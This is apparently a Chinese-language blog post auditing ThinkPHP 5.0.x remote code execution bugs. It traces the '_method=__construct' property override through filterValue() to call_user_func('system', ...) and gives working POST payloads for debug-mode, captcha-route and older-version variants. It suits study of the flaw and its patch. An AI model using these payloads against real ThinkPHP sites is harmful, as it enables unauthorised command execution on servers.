ThinkPHP5代码审计【RCE】

最新推荐文章于 2024-05-17 15:27:50 发布
最新推荐文章于 2024-05-17 15:27:50 发布
阅读量1k 收藏 4
点赞数 2
分类专栏: 代码审计
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/116782663
版权

文章目录

composer create-project --prefer-dist topthink/think=5.0.23 thinkphp_5.0.23

修改composer.json并去GitHub上下载thinkphp目录覆盖composer下载的thinkphp目录

开启debug模式

application/config.php下开启debug模式
在这里插入图片描述
同时可以看到_method变量
在这里插入图片描述

在thinkphp/start.php中打断点
在这里插入图片描述
按以下传值:

http://127.0.0.1/thinkphp_5.0.23/public/index.php

POST:
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami

在这里插入图片描述

分析

我们先分析run(),run()中一路过去都是配置一些东西,到routeCheck()方法需要跟进:
在这里插入图片描述
routeCheck()中有一个路由检测:
在这里插入图片描述
其中这一行获取变量$method,调用了Request类下的method方法
在这里插入图片描述

着重看看这里的method方法,它有一行这样的代码

$this->{$this->method}($_POST);

1.它会调用$this->method,这个$this->method来自于我们提交的伪装变量_method。可控!
2.而$_POST就是POST提交的值
总的来说就是可以调用Request类中的任意方法,参数是$_POST。是参数都是完全可控的,那应该调用什么方法呢?这就有很多选择了,但 __construct方法是能够覆盖类属性的,因此可以传值:_method=__construct。至此Request类的属性我们可以控制
在这里插入图片描述
关于routeCheck的剩下似乎都没啥好看的了,退出routeCheck方法。
在这里插入图片描述
接着往下走,判断是否开启debug,开启的话执行里面的操作

// 记录路由和请求信息
if (self::$debug) {
    Log::record('[ ROUTE ] ' . var_export($dispatch, true), 'info');
    Log::record('[ HEADER ] ' . var_export($request->header(), true), 'info');
    Log::record('[ PARAM ] ' . var_export($request->param(), true), 'info');
}

其中param() 获取当前请求的参数,这跟参数有关系的,跟进
在这里插入图片描述

private function filterValue(&$value, $key, $filters)
{
   $default = array_pop($filters);
   foreach ($filters as $filter) {
       if (is_callable($filter)) {
           // 调用函数或者方法过滤
           $value = call_user_func($filter, $value);	//RCE!!
       }
       ......
       }
   return $this->filterExp($value);
}

最后会调用Request类下十分危险的filterValue(),因为这个方法含有call_user_func函数。本意调用$filter对值进行过滤,但由于类属性$this->filter被我们控制了,在getFilter方法中就将$this->filter赋给了$filter,导致我们间接控制了$filter,而$filter作为call_user_func函数的第一个参数,call_user_func()的第二个参数来自于$this->server,也是可以被覆盖的,可控!自然能RCE了。

payload
#ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug:

http://127.0.0.1/thinkphp_5.0.23/public/index.php

POST:
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami




未开启debug

未开启debug的RCE需要验证码的扩展包,没有就下在这里插入图片描述

composer require topthink/think-captcha=1.*

然后把vendor目录替换原来的
在这里插入图片描述

在这里插入图片描述

分析

既然未开启debug,那么原来的这些代码是不可以执行了,那么其中的$request->param()也没戏了

if (self::$debug) {
  Log::record('[ ROUTE ] ' . var_export($dispatch, true), 'info');
  Log::record('[ HEADER ] ' . var_export($request->header(), true), 'info');
  Log::record('[ PARAM ] ' . var_export($request->param(), true), 'info');
}

run()中继续往下看会执行exec():
·
跟进:
在这里插入图片描述
可见一旦$dispatch['type']=controller或者method,那就是跟开启debug一样都能调用param()
进入到param()中剩下的都是一样的过程了…
但如何使$dispatch['type']=controller或者method?这里看七月火师傅的操作是借助验证码类的路由地址:
在这里插入图片描述

而在 ThinkPHP5 完整版中,定义了验证码类的路由地址。程序在初始化时,会通过自动类加载机制,将 vendor 目录下的文件加载,这样在 GET 方式中便多了这一条路由。我们便可以利用这一路由地址,使得 $dispatch[‘type’] 等于 method ,从而完成 远程代码执行 漏洞。

在helper.php中有这样一条路由:
在这里插入图片描述
可见只要传入?s=captcha即可使$route=\think\captcha\CaptchaController@index

thinkphp/library/think/Route.php的parseRule方法下:
$route以下面的值传入

$route="\think\captcha\CaptchaController@index"

其中,只要匹配到$route 含有 \,返回的数组result中type=method
在这里插入图片描述
在这里插入图片描述
routeCheck方法后得到$dispatch的值:其中 $dispatch['method']已是method
在这里插入图片描述

payload
# ThinkPHP <= 5.0.23 无需开启debug,需要存在xxx的method路由,例如captcha
POST /index.php?s=captcha 

_method=__construct&filter[]=system&method=get&get[]=ls+-al
# 或者
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
修复

Request类下的method方法中增加了$this->method的检测,这样可调用的类只限于GET 、POST、DELETE、PUT、PATCH
在这里插入图片描述

另类RCE

看到feng师傅的文章中介绍了一种另类RCE的方式
不开启debug,不使用s=captcha ,如何RCE?起初我用5.0.18尝试不成功,换成了5.0.10发现可以,看来有利用局限性,索性就用这个版本演示了。

主要还是利用_method=__construct进行类属性覆盖,param()->input()->FilterValue()->call_user_func()这个流程,方法还是那些方法,但“入口”不一样罢了
在这里插入图片描述

分析

run()中继续看routeCheck()
和之前的一样,通过调用__CONSTRUCT方法覆盖类属性,
在这里插入图片描述
在Route::check()方法中URL没有东西就返回false$result,然后进入parseUrl()
在这里插入图片描述
parseUrl()最后会返回type=module,跟之前的很类似,也是要得到使type=model
在这里插入图片描述
从而得$dispatch['type']=model
在这里插入图片描述
在这里插入图片描述
进入module方法,一直到最后有个invokeMethod(),跟进
在这里插入图片描述

在这里插入图片描述
又是调用了Request类中的param(),跟之前一样把 这个方法作为利用点
在这里插入图片描述
这里$method=POST,然后一路下去有input方法,跟进
在这里插入图片描述
由于POST中的data是数组,会通过array_walk_recursive()函数对$data中每一个元素调用filterValue()函数进行过滤,过滤参数是$filter=system
在这里插入图片描述
所以会对$data数组进行循环取值赋给$value,进行当$value=whoami时

call_user_func($filter, $value)
call_user_func('system','whoami')

成功RCE!

payload
# ThinkPHP 5.0.8~5.0.19 但不确定
http://127.0.0.1/5.0.9/public/

_method=__construct&filter=system&filter&s=whoami  #注意里面有2个filter
总结

审了TP5的RCE,感觉比较关键的是call_user_func()函数了,导致能调用它的FilterValue方法一直是"集火目标"

今天审的RCE中,感觉主要是这样一个流程:

  1. 利用_method=__construct进行Request类的属性值覆盖。为call_user_func()做准备
  2. param()->input()->FilterValue()->call_user_func()
 Request 类中的 
 param、route、get、post、put、delete、patch、request、session、server、env、cookie、input 方法均调用了 filterValue 方法
D.MIND
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
thinkphp5.x系列 RCE总结
weixin_30672019的博客
05-11 2822
Thinkphp MVC开发模式 执行流程: 首先发起请求->开始路由检测->获取pathinfo信息->路由匹配->开始路由解析->获得模块、控制器、操作方法调度信息->开始路由调度->解析模块和类名->组建命名空间>查找并加载类->实例化控制器并调用操作方法->构建响应对象->响应输出->日志保存->程序...
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7005
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
thinkphp5-rce
最新发布
shierbai的博客
05-17 422
method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8244
ThinkPHP5系列远程代码执行漏洞复现(详细)
Catfishcms漏洞复现
小小猪的博客
12-21 1655
Catfishcms漏洞复现 环境搭建: Catfishcms v4.8.54环境搭建 漏洞复现: 代码审计: _method=__construct Request类(catfish/library/think/Request.php)用于处理请求,函数method用于获取请求的类型 application/config.php 中定义了“表单请求类型伪装变量”: POST请求参数 “ _method=__construct ”,将 __construct 传给了var_metho.
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
geejkse_seff的博客
07-29 1655
好了,回到正题,继续跟进到877行,
php request漏洞利用,漏洞研究|ThinkPHP request函数远程代码执行
weixin_42299427的博客
03-10 607
原标题:漏洞研究|ThinkPHP request函数远程代码执行0x01 概述2019年1月11日爆了一个thinkphp 5.0.*远程rce的漏洞,跟进学习一下。0x02 漏洞分析根据ThinkPHP的补丁发现,修复部分在 library/think/Request.php文件中。 漏洞的修复点是 method这个函数,我们可以逆这回去看看,哪里调用了这个函数,相关调用方法出现在 libra...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
ThinkPHP5代码生成器.zip_possiblyntv_thinkphp_thinkphp5_tp 生成代码
09-20
ThinkPHP5代码生成器深度解析与应用》 在当今快速发展的互联网行业中,开发效率成为了决定项目成败的关键因素之一。为了提高开发效率,各种框架和工具应运而生,其中ThinkPHP5作为国内广泛使用的PHP框架,凭借其...
thinkphp5 验证码类库
04-29
thinkphp5 验证码类库 安装 composer require topthink/think-captcha 使用 模板里输出验证码 <div>{:captcha_img()} 或者 <div><img src="{:captcha_src()}" alt="captcha" /> 上面两种的最终效果是一样的 控制器...
ThinkPHP5分页paginate代码实例解析
12-16
参数 paginate(每页数量,是否简洁分页,分页参数) 使用方式 $list = db('user')->paginate(10); 自定义参数传参 $list = db('user')->paginate(10,false,['query'=>array('id' => $id)]); ...$this->assign(‘total’,...
thinkphp 源码分析系列(二)—— 路由
qq_41891666的博客
11-05 510
0x00 前言 这篇文章主要是结合 thinkphp 5.0.x 两个rce : (1)变量覆盖filter (2)没有开启强制路由导致rce 来分析thinkphp 的路由 0x01 路由检测 首先要说的是$dispatch 调度信息, 类似于: 调度信息最后会传入App::exec() 中: 而exec 会根据调度信息的type ,去调用相应的函数去映射到具体的函数上去执行。 App.php 中run() 函数中,$dispatch 是通过 App.php 中的routeCheck() 函数返回
Thinkphp5.1反序列化漏洞复现
qq_63928796的博客
11-02 1167
最近打ctf总是遇见一些cve,虽然能找到payload但光打payload属实无趣,所以简单看了一点代码审计thinkphp开发规则后开始跟几个thinkphp的漏洞。
[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析
Huamang的博客
11-26 5459
前言 漏洞存在版本,分为两大版本: ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 环境搭建 composer create-project topthink/think=5.0.5 thinkphp5.0.5 --prefer-dist 修改composer.json "require": { "php": ">=5.4.0", "topthink/framework": "5.0.5" }, 执行composer update
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2425
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
Thinkphp 5-RCE漏洞复现
Tender*的博客
08-10 700
ThinkPHP5披露最多得漏洞就是RCE,其中的影响版本范围非常广漏洞原理其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。影响版本不同版本 payload 不同,且5.13版本后还与debug模式有关漏洞复现进入​。
ThinkPHP多语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2108
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE)漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完全控制权限。 这个漏洞的原因是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值